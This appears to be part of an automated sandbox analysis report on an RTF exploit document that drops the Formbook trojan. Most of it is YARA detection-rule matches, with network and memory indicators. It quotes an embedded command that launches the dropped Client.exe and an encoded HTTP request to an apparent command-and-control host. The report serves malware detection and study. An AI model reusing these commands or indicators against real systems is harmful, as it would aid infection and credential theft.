Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.976786692.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.978377131.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010833057.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993943393.0000000008611000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 0000000A.00000000.1010360758.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995439916.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979257547.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.950353171.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.994846785.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979787030.000000000880D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.992888492.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011293822.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993114505.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010156944.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.976835880.00000000084D2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.1029291046.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.986329833.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.958357895.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 0000000A.00000000.988586812.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1006236115.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.968187098.0000000004385000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB22E69-27EE-49FB-B577-3348055FCC0D}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: www.magadirect.co.uk
          Source: global trafficHTTP traffic detected: GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1Host: www.magadirect.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /2014/sqlite-dll-win32-x86-3080700.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.sqlite.orgConnection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          E-Banking Fraud

Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Client.exe PID: 2948, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: notepad.exe PID: 2496, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPED | Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr | Stream path '_1721465586/\x1Ole10Native' : z....Client.exe.C:\Path\Client.exe.........C:\Path
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr | Stream path '_1721465588/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
Source: Client.exe.0.dr | Static PE information: section name:
Source: Client.exe | Static RTF information: Object: 0 Offset: 0000128Dh Client.exe
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLE | Matched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
